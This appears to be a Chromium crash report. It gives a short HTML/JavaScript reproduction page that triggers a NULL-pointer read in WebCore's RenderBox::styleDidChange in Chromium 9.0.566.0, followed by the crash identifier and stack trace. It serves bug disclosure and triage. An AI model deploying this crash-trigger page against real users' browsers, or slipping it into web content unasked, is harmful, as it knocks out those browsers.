Repro: <html><head><script> function go() { oSVGFEGaussianBlurElement = document.createElementNS("http://www.w3.org/2000/svg","Blr"); document.open(); document.insertBefore(oSVGFEGaussianBlurElement, null); document.close(); } </script></head><body onload="go();"></body></html> id: chrome.dll!WebCore::RenderBox::styleDidChange ReadAV@NULL (5469e3627c960fb7614ab99719952401) description: Attempt to read from unallocated NULL pointer+0x4 in chrome.dll!WebCore::RenderBox::styleDidChange application: Chromium 9.0.566.0 stack: chrome.dll!WebCore::RenderBox::styleDidChange chrome.dll!WebCore::RenderBlock::styleDidChange chrome.dll!WebCore::RenderObject::setStyle chrome.dll!WebCore::RenderObject::setAnimatableStyle chrome.dll!WebCore::Node::createRendererIfNeeded chrome.dll!WebCore::Element::attach chrome.dll!WebCore::HTMLConstructionSite::attach<...> chrome.dll!WebCore::HTMLConstructionSite::insertHTMLBodyElement chrome.dll!WebCore::HTMLTreeBuilder::processStartTag chrome.dll!WebCore::HTMLTreeBuilder::defaultForAfterHead chrome.dll!WebCore::HTMLTreeBuilder::processEndOfFile chrome.dll!WebCore::HTMLTreeBuilder::constructTreeFromAtomicToken chrome.dll!WebCore::HTMLTreeBuilder::constructTreeFromToken chrome.dll!WebCore::HTMLDocumentParser::pumpTokenizer chrome.dll!WebCore::HTMLDocumentParser::prepareToStopParsing chrome.dll!WebCore::DocumentWriter::endIfNotLoadingMainResource chrome.dll!WebCore::Document::close chrome.dll!WebCore::HTMLDocumentInternal::closeCallback chrome.dll!v8::internal::HandleApiCallHelper<...> chrome.dll!v8::internal::Builtin_HandleApiCall chrome.dll!v8::internal::Invoke chrome.dll!v8::internal::Execution::Call ...